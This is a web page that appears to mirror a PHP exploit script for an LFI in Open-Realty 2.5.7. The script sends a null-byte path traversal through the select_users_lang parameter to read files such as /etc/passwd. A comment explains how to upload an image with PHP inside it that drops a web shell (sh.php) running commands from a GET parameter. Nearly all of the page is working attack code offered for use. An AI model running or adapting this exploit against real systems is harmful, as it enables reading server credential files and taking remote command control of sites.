扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 |
<?php /* * Exploit Title: * Date: 2010-08-18 * Author: Nikola Petrov * Vendor: http://open-realty.org/ * Version: 2.5.7 */ /* vulnerable: Open-Realty 2.5.7 LFI: /index.php upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?> include the image and sh.php will be generated. proceed with sh.php MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0. */ print "\n\n#########################################################################\n"; print "#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n"; print "#Date: 05.09.2009\n"; print "#########################################################################\n\n"; if($argc < 5) { print "usage: $argv[0] host port path file [debug: 1/0]\n"; print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n"; exit(); } $Host = $argv[1]; $Port = $argv[2]; $Path = $argv[3]; $File = $argv[4]; function HttpSend($aHost, $aPort, $aPacket) { $Response = ""; if(!$Socket = fsockopen($aHost, $aPort)) { print "Error connecting to $aHost:$aPort\n\n"; exit(); } fputs($Socket, $aPacket); while(!feof($Socket)) $Response .= fread($Socket, 1024); fclose($Socket); return $Response; } $VulnRequest = "select_users_lang=". $File . "%00"; $Packet= "POST {$Path} HTTP/1.1\r\n"; $Packet .= "Host: {$Host}\r\n"; $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n"; $Packet .= "$VulnRequest\n"; if($argv[5] == 1) print $Packet; print HttpSend($Host, $Port, $Packet); ?> |
体验盒子
